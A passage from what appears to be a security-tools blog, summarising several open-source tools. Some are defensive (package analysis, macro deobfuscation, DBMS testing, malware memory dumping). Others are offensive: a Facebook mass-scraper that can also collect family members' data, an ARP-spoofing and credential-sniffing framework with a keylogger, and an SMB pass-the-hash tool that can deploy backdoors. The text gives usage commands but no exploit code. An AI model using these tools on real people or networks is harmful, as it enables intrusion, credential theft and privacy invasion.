-i ID [ID ...], --id ID [ID ...]
Set the profile identification number.
--use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a
txt.
-S USER, --search USER
It does a shallow search for the username. Replace the
spaces with '.'(period).
-sf, --scrape-family If this parameter is passed, the information from
family members will be scraped if available.
--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]
Use the index number to return a specific part of the
page. about: 0,about_contact_and_basic_info:
1,about_family_and_relationships: 2,about_details:
3,about_work_and_education: 4,about_places: 5.
-s, --several Returns extra data like profile picture, number of
followers and friends.
-b, --browser Opens the browser/bot.
--email EMAIL If the profile is blocked, you can define your
account, however you have the search user in your
fri ends list.
--password PASSWORD Set the password for your facebook account, this
parameter has to be used with --email.
-o, --file-output Save the output data to a .txt file.
-c, --compact Compress all .txt files. Use together with -o.
-v, -d, --verbose, --debug
It shows in detail the data search process.
-q, --quiet Eliminates and simplifies some script outputs for a
simpler and more discrete visualization.

To search for a user:

  • User name: python3 fisherman.py -u name name.profile name.profile2
  • ID: python3 fisherman.py -i 000000000000

The username must be found on the facebook profile link, such as:

https://facebook.com/name.profile/

It is also possible to load multiple usernames from a .txt file, this can be useful for a brute force output type:

python3 fisherman.py --use-txt filename.txt

Some profiles are limited to displaying your information for any account, so you can use your account to extract. Note: this should be used as the last hypothesis, and the target profile must be on your friends list:

python3 fisherman.py --email [email protected] --password yourpass

Some situations:
  • For complete massive scrape:

    python3 fisherman.py --use-txt file -o -c -sf

    With a file with dozens of names on each line, you can make a complete "scan" taking your information and even your family members and will be compressed into a .zip at the output.

  • For specific parts of the account:

    • Basic data: python3 fisherman.py -u name --specify 0
    • Family and relationship: python3 -u name --specify 2
    • It is still possible to mix: python3 fisherman.py -u name --specify 0 2
  • To get additional things like profile picture, how many followers and how many friends:

    python3 fisherman.py -u name -s

This tool only extracts information that is public, not use for private or illegal purposes.

LICENSE

BSD 3-Clause ยฉ FisherMan Project

Original Creator - Godofcoffe



PackageDNA - Tool To Analyze Software Packages Of Different Programming Languages That Are Being Or Will Be Used In Their Codes

20 August 2021 at 21:30
By: Zion3R


This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes. secure development, if currently supported, possible backdoors (malicious embedded code), typosquatting analysis, the history of versions and reported vulnerabilities (CVEs) of the package.


Installation

Clone this repository with:

git clone https://github.com/ElevenPaths/packagedna

PackageDNA uses python-magic which is a simple wrapper around the libmagic C library, and that MUST be installed as well:

Debian/Ubuntu
$ sudo apt-get install libmagic1

Windows
You will need DLLs for libmagic. @julian-r has uploaded a version of this project that includes binaries
to PyPI: https://pypi.python.org/pypi/python-magic-bin/0.4.14
Other sources of the libraries in the past have been File for Windows.
You will need to copy the file magic out of [binary-zip]\share\misc, and pass its location to Magic(magic_file=...).

If you are using a 64-bit build of python, you will need 64-bit libmagic binaries which can be found here: https://github.com/pidydx/libmagicwin64.
Newer version can be found here: https://github.com/nscaife/file-windows.

OSX
When using Homebrew: brew install libmagic
When using macports: port install file


More details: https://pypi.org/project/python-magic/

Run setup for installation:

python3 setup.py install --user

External Modules

PackageDNA uses external modules for its analysis that you should install previously:

Microsoft AppInpsector

https://github.com/microsoft/ApplicationInspector

Virus Total API

https://www.virustotal.com/

LibrariesIO API

https://libraries.io/

Rubocop

https://github.com/rubocop/rubocop

After installation you should configure the external modules, in the option [7] Configuration of the main menu.

VirusTotal API Key: Your API KEY [2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation [3] Libraries.io API Key: Your API KEY [4] Github Token: Your Token [B] Back [X] Exit ">
[1] VirusTotal API Key: Your API KEY
[2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation
[3] Libraries.io API Key: Your API KEY
[4] Github Token: Your Token
[B] Back
[X] Exit

NOTE: External modules are not mandatory. PackageDNA will continue its execution, however we recommend making all the configurations of these modules so that the tool performs a complete analysis


Running PackageDNA

Inside the PackageDNA directory:

./packagedna.py
Analyzer Framework By ElevenPaths https://www.elevenpaths.com/ Usage: python3 ./packagedna.py [*] -------------------------------------------------------------------------------------------------------------- [*] [!] Select from the menu: [*] -------------------------------------------------------------------------------------------------------------- [*] [1] Analyze Package (Last Version) [2] Analyze Package (All Versions) [3] Analyze local package [4] Information gathering [5] Upload file and analyze all Packages [6] List previously analyzed packages [7] Configurations [X] Exit [*] -------------------------------------------------------------------------------------------------------------- [*] [!] Enter your selection: ">
_____              _                          ____     __     _  _______ 
| __ \ | | | __ \ | \ | || ___ |
| |__) |__ __ ____ | | __ __ __ ____ ___ | | \ \ | |\ \ | || |___| |
| ___// _` |/ __)| |/ / / _` | / _ | / _ \| | | || | \ \| || ___ |
| | | (_| || (__ | |\ \ | (_| || (_| || __/| |__/ / | | \ || | | |
|_| \__,_|\____)|_| \_\ \__,_| \__ | \___||_____/ |_| \__||_| |_|
__| |
(____|

Modular Packages Analyzer Framework
By ElevenPaths https://www.elevenpaths.com/
Usage: python3 ./packagedna.py

[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Select from the menu:
[*] -------------------------------------------------------------------------------------------------------------- [*]
[1] Analy ze Package (Last Version)
[2] Analyze Package (All Versions)
[3] Analyze local package
[4] Information gathering
[5] Upload file and analyze all Packages
[6] List previously analyzed packages
[7] Configurations
[X] Exit
[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Enter your selection:


Brutus - An Educational Exploitation Framework Shipped On A Modular And Highly Extensible Multi-Tasking And Multi-Processing Architecture

21 August 2021 at 12:30
By: Zion3R


An educational exploitation framework shipped on a modular and highly extensible multi-tasking and multi-processing architecture.


Brutus: an Introduction

Looking for version 1? See the branches in this repository.

Brutus is an educational exploitation framework written in Python. It automates pre and post-connection network-based exploits, as well as web-based reconnaissance. As a light-weight framework, Brutus aims to minimize reliance on third-party dependencies. Optimized for Kali Linux, Brutus is also compatible with macOS and most Linux distributions, featuring a fully interactive command-line interface and versatile plugin system.

Brutus features a highly-extensible, modular architecture. The included exploits (plugins layer) consists of several decoupled modules that run on a 'tasking layer' comprised of thread pools and thread-safe, async queues (whichever is most appropriate for the given module). The main thread runs atop a multi-processing pool that manages app context and dispatches new processes so tasks can run in the background, in separate shells, etc.

The UI layer is also decoupled and extensible. By default, Brutus ships with a menu-based command-line interface UI but there's no reason you can't add adapters for a GUI, an argument parser, or even an HTTP API or remote procedure call.

Last, Brutus has a utility layer with common faculties for file-system operations, shell (terminal emulator) management, persistence methods, and system metadata.

If you're just interested in some Python hacking, feel free to pull the scripts directly - each module can be invoked standalone.


Demos

Web Scanning and Payload Compilation Demo: watch mp4ย 


Installation

You will probably want the following dependencies:

  • sslstrip
  • pipenv

Brutus is optimized for Kali Linux. There's lots of information online about how to run Kali Linux in a VM.

To install:

pipenv install

Usage

Run:

pipenv run brutus

Test:

pipenv run test

Lint:

pipenv run lint

Setup Git Hooks for Development:

pipenv run setup

Feel free to open PRs with feature proposals, bugfixes, et al. Note that much of this project is still in progress. The base is there and ready for you to build upon.


Brutus: Features and Included Modules

Brutus includes several modules which can be generalized as belonging to three macro-categories: network-based, web-based, and payloads. The latter category is a library of compilers and accompanying payloads - payloads can be compiled via Brutus' interactive command-line menu; compiled payloads can subsequently be loaded into many of Brutus' applicable network-based modules.

The base layer of Brutus utilizes POSIX threads for concurrent multi-tasking. Some modules - i.e. essentially anything heavily I/O bound - instead utilize Python's async I/O libraries and run on an abstraction atop Python's default event loop.

Included Utilities/Scripts

  • IP Table Management
  • Downgrade HTTPS to HTTP
  • Enable Monitor Mode
  • Enable Port Forwarding
  • Keylogger

Documentation

48-bit MAC Address Changer (view source)

NOTE: This tool is for 48-bit MACs, with a %02x default byte format.

MAC (Media Access Control) is a permanent, physical, and unique address assigned to network interfaces by device manufacturers. This means even your wireless card, for instance, has its own unique MAC address.

The MAC address, analogous to an IP on the internet, is utilized within a network in order to facilitate the proper delivery of resources and data (i.e. packets). An interaction will generally consist of a source MAC and a destination MAC. MAC addresses can identify you, be filtered, or otherwise access-restricted.

Important to note is these unique addresses are not ephemeral; they are persistent and will remain associated with a device were a user to install it in another machine. But the two don't have to be inextricably intertwined...

This module will accept as user-input any given wireless device and any valid MAC address to which the user wishes to reassign said device. The program is simple such that I need not explain it much further: it utilizes the subprocess module to automate the sequence of the necessary shell commands to bring the wireless interface down, reassign the MAC, and reinitialize it.

If you are actively changing your MAC address, it might be prudent to have some sort of validation structure or higher order method to ensure that 1) the wireless device exists, 2) the wireless device accommodates a MAC address, 3) the user-input MAC address is of a valid format, and 4) the wireless device's MAC address has successfully been updated. This tool automates these functions.

By selecting the 'generate' option in lieu of a specific MAC address, the program will generate a valid MAC address per IEEE specifications. I'm excited to have implemented extended functionality for generating not only wholly random (and valid) MAC addresses, but MAC addresses which either begin with a specific vendor prefix (OUI), or are generated with multicast and/or UAA options. These options trigger byte-code logic in the generator method, which are augmented per IEEE specifications. Learn more about MAC addresses here.


ARP-Based Network Scanner (view source)

The network scanner is another very useful tool, and a formidable one when used in conjunction with the aforementioned MAC changer. This scanner utilizes ARP request functionality by accepting as user input a valid ipv4 or ipv6 IP address and accompanying - albeit optional - subnet range.

The program then takes the given IP and/or range, then validates them per IEEE specifications (again, this validation is run against ipv4 and ipv6 standards). Finally, a broadcast object is instantiated with the given IP and a generated ethernet frame; this object returns to us a list of all connected devices within the given network and accompanying range, mapping their IPs to respective MAC addresses.

The program outputs a table with these associations, which then might be used as input for the MAC changer should circumstances necessitate it.


Automated ARP Spoofing (view source)

The ARP Spoof module enables us to redirect the flow of packets in a given network by simultaneously manipulating the ARP tables of a given target client and its network's gateway. This module auto-enables port forwarding during this process, and dynamically constructs and sends ARP packets.

When the module is terminated by the user, the targets' ARP tables are reset, so as not to leave the controller in a precarious situation (plus, it's the nice thing to do).

Because this process places the controller in the middle of the packet-flow between the client and AP, the controller therefore has access to all dataflow (dealing with potential encryption of said data is a task for another script). From here, the myriad options for packet-flow orchestration become readily apparent: surrogation of code by way of automation and regular expressions, forced redirects, remote access, et al. Fortunately, Brutus can automate this, too.


HTTP Packet Sniffer (view source)

The packet sniffer is an excellent module to employ after running the ARP Spoofer; it creates a dataflow of all intercepted HTTP packets' data which includes either URLs, or possible user credentials.

The script is extensible and can accommodate a variety of protocols by instantiating the listener object with one of many available filters. Note that Brutus automatically downgrades HTTPS, so unless HSTS is involved, the dataflow should be viable for reconnaissance.

Disclaimer: This software and all contents therein were created for research use only. I neither condone nor hold, in any capacity, responsibility for the actions of those who might intend to use this software in a manner malicious or otherwise illegal.



XLMMacroDeobfuscator - Extract And Deobfuscate XLM Macros (A.K.A Excel 4.0 Macros)

21 August 2021 at 21:30
By: Zion3R


XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully performing the code.

It supports both xls, xlsm, and xlsb formats.

It uses xlrd2, pyxlsb2 and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.

You can also find XLM grammar in xlm-macro-lark.template


Installing the emulator
  1. Install using pip
pip install XLMMacroDeobfuscator
  1. Installing the latest development
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

Running the emulator

To deobfuscate macros in Excel documents:

xlmdeobfuscator --file document.xlsm

To only get the deobfuscated macros and without any indentation:

xlmdeobfuscator --file document.xlsm --no-indent --output-formula-format "[[INT-FORMULA]]"

To export the output in JSON format

xlmdeobfuscator --file document.xlsm --export-json result.json

To see a sample JSON output, please check this link out.

To use a config file

xlmdeobfuscator --file document.xlsm -c default.config

default.config file must be a valid json file, such as:

{
"no-indent": true,
"output-formula-format": "[[CELL-ADDR]] [[INT-FORMULA]]",
"non-interactive": true,
"output-level": 1
}

Command Line
emulation after N seconds (0: not interruption N>0: stop emulation after N seconds) ">

_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/


XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

usage: deobfuscator.py [-h] [-c FILE_PATH] [-f FILE_PATH] [-n] [-x] [-2]
[--with-ms-excel] [-s] [-d DAY]
[--output-formula-format OUTPUT_FORMULA_FORMAT]
[--no-indent] [--export-json FILE_PATH]
[--start-point CELL_ADDR] [-p PASSWORD]
[-o OUTPUT_LEVEL]

optional arguments:
-h, --help show this help message and exit
-c FILE_PATH, --config_file FILE_PATH
Specify a config file (must be a valid JSON file)
-f FILE_PATH, --file FILE_PATH
The path of a XLSM file
-n , --noninteractive Disable interactive shell
-x, --extract-only Only extract cells without any emulation
-2, --no-ms-excel [Deprecated] Do not use MS Excel to process XLS files
--with-ms-excel Use MS Excel to process XLS files
-s, --start-with-shell
Open an XLM shell before interpreting the macros in
the input
-d DAY, --day DAY Specify the day of month
--output-formula-format OUTPUT_FORMULA_FORMAT
Specify the format for output formulas ([[CELL-ADDR]],
[[INT-FORMULA]], and [[STATUS]]
--no-indent Do not show indent before formulas
--export-json FILE_PATH
Export the output to JSON
--start-point CELL_ADDR
Start interpretation from a specific cell address
-p PASSWORD, --password PASSWORD
Password to decrypt t he protected document
-o OUTPUT_LEVEL, --output-level OUTPUT_LEVEL
Set the level of details to be shown (0:all commands,
1: commands no jump 2:important commands 3:strings in
important commands).
--timeout N stop emulation after N seconds (0: not interruption
N>0: stop emulation after N seconds)

Library

The following example shows how XLMMacroDeobfuscator can be used in a python project to deobfuscate XLM macros:

from XLMMacroDeobfuscator.deobfuscator import process_file

result = process_file(file='path/to/an/excel/file',
noninteractive= True,
noindent= True,
output_formula_format='[[CELL-ADDR]], [[INT-FORMULA]]',
return_deobfuscated= True,
timeout= 30)

for record in result:
print(record)
  • note: the xlmdeofuscator logo will not be shown when you use it as a library

Requirements

Please read requirements.txt to get the list of python libraries that XLMMacroDeobfuscator is dependent on.

xlmdeobfuscator can be executed on any OS to extract and deobfuscate macros in xls, xlsm, and xlsb files. You do not need to install MS Excel.

Note: if you want to use MS Excel (on Windows), you need to install pywin32 library and use --with-ms-excel switch. If --with-ms-excel is used, xlmdeobfuscator, first, attempts to load xls files with MS Excel, if it fails it uses xlrd2 library.


Project Using XLMMacroDeofuscator

XLMMacroDeofuscator is adopted in the following projects:

Please contact me if you incorporated XLMMacroDeofuscator in your project.


How to Contribute

If you found a bug or would like to suggest an improvement, please create a new issue on the issues page.

Feel free to contribute to the project forking the project and submitting a pull request.

You can reach me (@DissectMlaware) on Twitter via a direct message.



SQLancer - Detecting Logic Bugs In DBMS

22 August 2021 at 12:30
By: Zion3R


SQLancer (Synthesized Query Lancer) is a tool to automatically test Database Management Systems (DBMS) in order to find logic bugs in their implementation. We refer to logic bugs as those bugs that cause the DBMS to fetch an incorrect result set (e.g., by omitting a record).

SQLancer operates in the following two phases:

  1. Database generation: The goal of this phase is to create a populated database, and stress the DBMS to increase the probability of causing an inconsistent database state that could be detected subsequently. First, random tables are created. Then, randomly SQL statements are chosen to generate, modify, and delete data. Also other statements, such as those to create indexes as well as views and to set DBMS-specific options are sent to the DBMS.
  2. Testing: The goal of this phase is to detect the logic bugs based on the generated database. See Testing Approaches below.

Getting Started

Requirements:

  • Java 8 or above
  • Maven (sudo apt install maven on Ubuntu)
  • The DBMS that you want to test (SQLite is an embedded DBMS and is included)

The following commands clone SQLancer, create a JAR, and start SQLancer to test SQLite using Non-optimizing Reference Engine Construction (NoREC):

git clone https://github.com/sqlancer/sqlancer
cd sqlancer
mvn package -DskipTests
cd target
java -jar sqlancer-*.jar --num-threads 4 sqlite3 --oracle NoREC

If the execution prints progress information every five seconds, then the tool works as expected. Note that SQLancer might find bugs in SQLite. Before reporting these, be sure to check that they can still be reproduced when using the latest development version. The shortcut CTRL+C can be used to terminate SQLancer manually. If SQLancer does not find any bugs, it executes infinitely. The option --num-tries can be used to control after how many bugs SQLancer terminates. Alternatively, the option --timeout-seconds can be used to specify the maximum duration that SQLancer is allowed to run.

If you launch SQLancer without parameters, available options and commands are displayed. Note that general options that are supported by all DBMS-testing implementations (e.g., --num-threads) need to precede the name of DBMS to be tested (e.g., sqlite3). Options that are supported only for specific DBMS (e.g., --test-rtree for SQLite3), or options for which each testing implementation provides different values (e.g. --oracle NoREC) need to go after the DBMS name.


Research Prototype

This project should at this stage still be seen as a research prototype. We believe that the tool is not ready to be used. However, we have received many requests by companies, organizations, and individual developers, which is why we decided to prematurely release the tool. Expect errors, incompatibilities, lack of documentation, and insufficient code quality. That being said, we are working hard to address these issues and enhance SQLancer to become a production-quality piece of software. We welcome any issue reports, extension requests, and code contributions.


Testing Approaches
Approach Description
Pivoted Query Synthesis (PQS) PQS is the first technique that we designed and implemented. It randomly selects a row, called a pivot row, for which a query is generated that is guaranteed to fetch the row. If the row is not contained in the result set, a bug has been detected. It is fully described here. PQS is the most powerful technique, but also requires more implementation effort than the other two techniques. It is currently unmaintained.
Non-optimizing Reference Engine Construction (NoREC) NoREC aims to find optimization bugs. It is described here. It translates a query that is potentially optimized by the DBMS to one for which hardly any optimizations are applicable, and compares the two result sets. A mismatch between the result sets indicates a bug in the DBMS.
Ternary Logic Partitioning (TLP) TLP partitions a query into three partitioning queries, whose results are composed and compare to the original query's result set. A mismatch in the result sets indicates a bug in the DBMS. In contrast to NoREC and PQS, it can detect bugs in advanced features such as aggregate functions.

Please find the .bib entries here.


Supported DBMS

Since SQL dialects differ widely, each DBMS to be tested requires a separate implementation.

DBMS Status Expression Generation Description
SQLite Working Untyped This implementation is currently affected by a significant performance regression that still needs to be investigated
MySQL Working Untyped Running this implementation likely uncovers additional, unreported bugs.
PostgreSQL Working Typed
Citus (PostgreSQL Extension) Working Typed This implementation extends the PostgreSQL implementation of SQLancer, and was contributed by the Citus team.
MariaDB Preliminary Untyped The implementation of this DBMS is very preliminary, since we stopped extending it after all but one of our bug reports were addressed. Running it likely uncovers additional, unreported bugs.
CockroachDB Working Typed
TiDB Working Untyped
DuckDB Working Untyped, Generic
ClickHouse Preliminary Untyped, Generic Implementing the different table engines was not convenient, which is why only a very preliminary implementation exists.
TDEngine Removed Untyped We removed the TDEngine implementation since all but one of our bug reports were still unaddressed five months after we reported them.

Using SQLancer

Logs

SQLancer stores logs in the target/logs subdirectory. By default, the option --log-each-select is enabled, which results in every SQL statement that is sent to the DBMS being logged. The corresponding file names are postfixed with -cur.log. In addition, if SQLancer detects a logic bug, it creates a file with the extension .log, in which the statements to reproduce the bug are logged.


Reducing a Bug

After finding a bug, it is useful to produce a minimal test case before reporting the bug, to save the DBMS developers' time and effort. For many test cases, C-Reduce does a great job. In addition, we have been working on a SQL-specific reducer, which we plan to release soon.


Found Bugs

We would appreciate it if you mention SQLancer when you report bugs found by it. We would also be excited to know if you are using SQLancer to find bugs, or if you have extended it to test another DBMS (also if you do not plan to contribute it to this project). SQLancer has found over 400 bugs in widely-used DBMS, which are listed here.


Community

We have created a Slack workspace to discuss SQLancer, and DBMS testing in general. SQLancer's official Twitter handle is @sqlancer_dbms.


Additional Documentation

Releases

Official release are available on:


Additional Resources
  • A talk on Ternary Logic Partitioning (TLP) and SQLancer is available on YouTube.
  • An (older) Pivoted Query Synthesis (PQS) talk is available on YouTube.
  • PingCAP has implemented PQS, NoREC, and TLP in a tool called go-sqlancer.
  • More information on our DBMS testing efforts and the bugs we found is available here.


Keimpx - Check For Valid Credentials Across A Network Over SMB

22 August 2021 at 21:30
By: Zion3R


keimpx is an open source tool, released under the Apache License 2.0.

It can be used to quickly check for valid credentials across a network over SMB. Credentials can be:

  • Combination of user / plain-text password.
  • Combination of user / NTLM hash.
  • Combination of user / NTLM logon session token.

If any valid credentials are discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use. They will then be provided with an interactive SMB shell where the user can:

  • Spawn an interactive command prompt.
  • Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
  • Deploy and undeploy their own services, for instance, a backdoor listening on a TCP port for incoming connections.
  • List users details, domains and password policy.
  • More to come, see the issues page.

Dependencies

keimpx is currently developed using Python 3.8 and makes use of the excellent Impacket library from SecureAuth Corporation for much of its functionality. keimpx also makes use of the PyCryptodome library for cryptographic functions.


Installation

To install keimpx, first install Python 3.8. On Windows, you can find the installer at this link. For Linux users, many distributions provide Python 3 and make it available via your package manager (usual package names include python3 and python).

On Linux systems, you may also need to install pip and openssl-dev using your package manager for the next step.

Once you have Python 3.8 installed, use pip to install the required dependencies using this command:

pip install -r requirements.txt

keimpx can then be executed by running on Linux systems:

./keimpx.py [options]

Or if this doesn't work:

python keimpx.py [options]
python3 keimpx.py [options]

On Windows systems, you may need to specify the full path to your Python 3.8 binary, for example:

C:\Python37\bin\python.exe keimpx.py [options]

Please ensure you use the correct path for your system, as this is only an example.


Usage

Let's say you are performing an infrastructure penetration test of a large network, you owned a Windows workstation, escalated your privileges to Administrator or LOCAL SYSTEM and dumped password hashes.

You also enumerated the list of machines within the Windows domain via net command, ping sweep, ARP scan and network traffic sniffing.

Now, what if you want to check for the validity of the dumped hashes without the need to crack them across the whole Windows network over SMB? What if you want to login to one or more system using the dumped NTLM hashes then surf the shares or even spawn a command prompt?

Fire up keimpx and let it do the work for you!

Another scenario where it comes handy is discussed in this blog post.


Help message
keimpx 0.5.1-rc
by Bernardo Damele A. G. <[email protected]>

Usage: keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default: 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default: 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default: 10)
-b Batch mode: do not ask to get an interactive SMB shell
-x EXECUTELIST Execute a list of commands against all hosts

For examples see this wiki page.


Frequently Asked Questions

See this wiki page.


License

Copyright 2009-2020 Bernardo Damele A. G. [email protected]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.


Contributors

Thanks to:

  • deanx - for developing polenum and some classes ripped from him.
  • Wh1t3Fox - for updating polenum to make it compatible with newer versions of Impacket.
  • frego - for his Windows service bind-shell executable and help with the service deploy/undeploy methods.
  • gera, beto and the rest of the SecureAuth Corporation guys - for developing such amazing Python library and providing it with examples.
  • NEXUS2345 - for updating and maintaining keimpx.


Process-Dump - Windows Tool For Dumping Malware PE Files From Memory Back To Disk For Analysis

23 August 2021 at 12:30
By: Zion3R


Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners, however when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA.

Process Dump works for Windows 32 and 64 bit operating systems and can dump memory components from specific processes or from all processes currently running. Process Dump supports creation and use of a clean-hash database, so that dumping of all the clean files such as kernel32.dll can be skipped. It's main features include:

  • Dumps code from a specific process or all processes.
  • Finds and dumps hidden modules that are not properly loaded in processes.
  • Finds and dumps loose code chunks even if they aren't associated with a PE file. It builds a PE header and import table for the chunks.
  • Reconstructs imports using an aggressive approach.
  • Can run in close dump monitor mode ('-closemon'), where processes will be paused and dumped just before they terminate.
  • Multi-threaded, so when you are dumping all running processes it will go pretty quickly.
  • Can generate a clean hash database. Generate this before a machine is infected with malware so Process Dump will only dump the new malicious malware components.

I'm maintaining an official compiled release on my website here: http://split-code.com/processdump.html


Installation

You can download the latest compiled release of Process Dump here:

This tool requires Microsoft Visual C++ Redistributable for Visual Studio 2015 to be installed to work:


Compiling source code

This is designed for Visual Studio 2019 and works with the free Community edition. Just open the project file with VS2019 and compile, it should be that easy!


Example Usage

Dump all modules and hidden code chunks from all processes on your system (ignoring known clean modules):

  • pd64.exe -system

Run in terminate monitor mode. Until cancelled (CTRL-C), Process Dump will dump any process just before the termination:

  • pd64.exe -closemon

Dump all modules and hidden code chunks from a specific process identifier:

  • pd64.exe -pid 0x18A

Dump all modules and hidden code chunk by process name:

  • pd64.exe -p .*chrome.*

Build clean-hash database. These hashes will be used to exclude modules from dumping with the above commands:

  • pd64.exe -db gen

Dump code from a specific address in PID 0x1a3:

  • pd64.exe -pid 0x1a3 -a 0xffb4000
  • Generates two files (32 and 64 bit) that can be loaded for analysis in IDA with generated PE headers and generated import table:
  • notepad_exe_x64_hidden_FFB40000.exe
  • notepad_exe_x86_hidden_FFB40000.exe

Example sandbox usage

If you are running an automated sandbox or manual anti-malware research environment, I recommend running the following process with Process Dump, run all commands as Administrator:

  • On your clean environment build the clean hash database:
  • pd64.exe -db gen
  • (or more quickly) pd64 -db genquick
  • Begin the Process Dump terminate monitor. Leave this running in the background to dump all the intermediate processes used by the malware:
  • pd64.exe -closemon
  • Run the malware file
  • Watch the malware install (and pd64 dumping any process that tries to close)
  • When you are ready to dump the running malware from memory, run the following command to dump all processes:
  • pd64.exe -system
  • All the dumped components will be in the working directory of pd64.exe. You can change the output path using the '-o' flag,

Notes on the naming convention of dumped modules:
  • 'hiddemodule' in the filename instead of the module name indicates the module was not properly registered in the process.
  • 'codechunk' in the filename means that it is a reconstructed dump from a loose executable region. This can be for example injected code that did not have a PE header. Codechunks will be dumped twice, once with a reconstructed x86 and again with a reconstructed x64 header.

Example filenames of dumped files

  • notepad_exe_PID2990_hiddenmodule_16B8ABB0000_x86.dll
  • notepad_exe_PID3b5c_notepad.exe_7FF6E6630000_x64.exe
  • notepad_exe_PID2c54_codechunk_17BD0000_x86.dll
  • notepad_exe_PID2c54_codechunk_17BD0000_x64.dll

Help Page

Process Dump v2.1 Copyright ยฎ 2017, Geoff McDonald http://www.split-code.com/

Process Dump (pd.exe) is a tool used to dump both 32 and 64 bit executable modules back to disk from memory within a process address space. This tool is able to find and dump hidden modules as well as loose executable code chunks, and it uses a clean hash database to exclude dumping of known clean files. This tool uses an aggressive import reconstruction approach that links all DWORD/QWORDs that point to an export in the process to the corresponding export function. Process dump can be used to dump all unknown code from memory ('-system' flag), dump specific processes, or run in a monitoring mode that dumps all processes just before they terminate.

Before first usage of this tool, when on the clean workstation the clean exclusing hash database can be generated by either:

  • pd -db gen
  • pd -db genquick

Example Usage:

  • pd -system
  • pd -pid 419
  • pd -pid 0x1a3
  • pd -pid 0x1a3 -a 0x401000 -o c:\dump\ -c c:\dump\test\clean.db
  • pd -p chrome.exe
  • pd -p "(?i).*chrome.*"
  • pd -closemon

Options:

  • -system

Dumps all modules not matching the clean hash databas from all accessible processes into the working directory.

  • -pid <pid>

Dumps all modules not matching the clean hash database from the specified pid into the current working directory. Use a '0x' prefix to specify a hex PID.

  • -closemon

Runs in monitor mode. When any processes are terminating process dump will first dump the process.

  • -p <regex>

Dumps all modules not matching the clean hash database from the process name found to match the filter into specified pid into the current working directory.

  • -a <module base address>

Dumps a module at the specified base address from the process.

  • -g

Forces generation of PE headers from scratch, ignoring existing headers.

  • -o <path>

Sets the default output root folder for dumped components.

  • -v

Verbose.

  • -nh

No header is printed in the output.

  • -nr

Disable recursion on hash database directory add or remove commands.

  • -ni

Disable import reconstruction.

  • -nc

Disable dumping of loose code regions.

  • -nt

Disable multithreading.

  • -nep

Disable entry point hashing.

  • -eprec

Force the entry point to be reconstructed, even if a valid one appears to exist.

  • -t <thread count>

Sets the number of threads to use (default 16).

  • -cdb <filepath>

Full filepath to the clean hash database to use for this run.

  • -edb <filepath>

Full filepath to the entrypoint hash database to use for this run.

  • -esdb <filepath>

Full filepath to the entrypoint short hash database to use for this run.

  • -db gen

Automatically processes a few common folders as well as all the currently running processes and adds the found module hashes to the clean hash database. It will add all files recursively in: %WINDIR% %HOMEPATH% C:\Program Files
C:\Program Files (x86)
As well as all modules in all running processes

  • -db genquick

Adds the hashes from all modules in all processes to the clean hash database. Run this on a clean system.

  • -db add <dir>

Adds all the files in the specified directory recursively to the clean hash database.

  • -db rem <dir>

Removes all the files in the specified directory recursively from the clean hash database.

  • -db clean

Clears the clean hash database.

  • -db ignore

Ignores the clean hash database when dumping a process this time. All modules will be dumped even if a match is found.


Version history

Version 2.1 (February 12th, 2017)
  • Fixed a bug where the last section in some cases would instead be filled with zeros. Thanks to megastupidmonkey for reporting this issue.
  • Fixed a bug where 64-bit base addresses would be truncated to a 32-bit address. It now properly keeps the full 64-bit module base address. Thanks to megastupidmonkey for reporting this issue.
  • Addressed an issue where the processes dump close monitor would crash csrss.exe.
